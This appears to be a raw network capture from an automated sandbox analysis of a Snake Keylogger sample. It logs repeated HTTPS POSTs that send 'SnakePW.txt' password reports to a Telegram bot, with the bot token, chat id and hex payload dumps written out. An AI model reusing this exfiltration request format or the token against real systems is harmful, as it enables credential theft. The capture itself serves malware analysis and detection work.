                                                                    2022-06-26 07:33:12 UTC134INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66836,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228792,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    8192.168.2.549776149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:41 UTC13OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d62b529c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:41 UTC13OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 36 32 62 35 32 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d62b529cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:41 UTC14INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:41 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:41 UTC14INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66754,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228761,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    80192.168.2.549913149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:12 UTC135OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e8a58707
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:12 UTC135OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 38 61 35 38 37 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e8a58707Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:12 UTC135INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:12 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:12 UTC136INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66837,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228792,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    81192.168.2.549914149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:13 UTC136OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e936f62b
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:13 UTC137OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 39 33 36 66 36 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e936f62bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:13 UTC137INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:13 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:13 UTC138INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66838,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228793,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    82192.168.2.549917149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:14 UTC138OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e98a6837
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:14 UTC138OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 39 38 61 36 38 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e98a6837Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:14 UTC139INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:14 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:14 UTC139INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66839,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228794,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    83192.168.2.549919149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:14 UTC140OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e9bedca3
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:14 UTC140OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 39 62 65 64 63 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e9bedca3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:14 UTC141INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:14 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:14 UTC141INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66840,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228794,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    84192.168.2.549922149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:14 UTC141OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ea0b2858
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:14 UTC142OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 30 62 32 38 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ea0b2858Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:15 UTC142INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:15 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:15 UTC143INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66841,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228795,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    85192.168.2.549925149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:15 UTC143OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ea492460
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:15 UTC143OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 34 39 32 34 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ea492460Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:15 UTC144INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:15 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
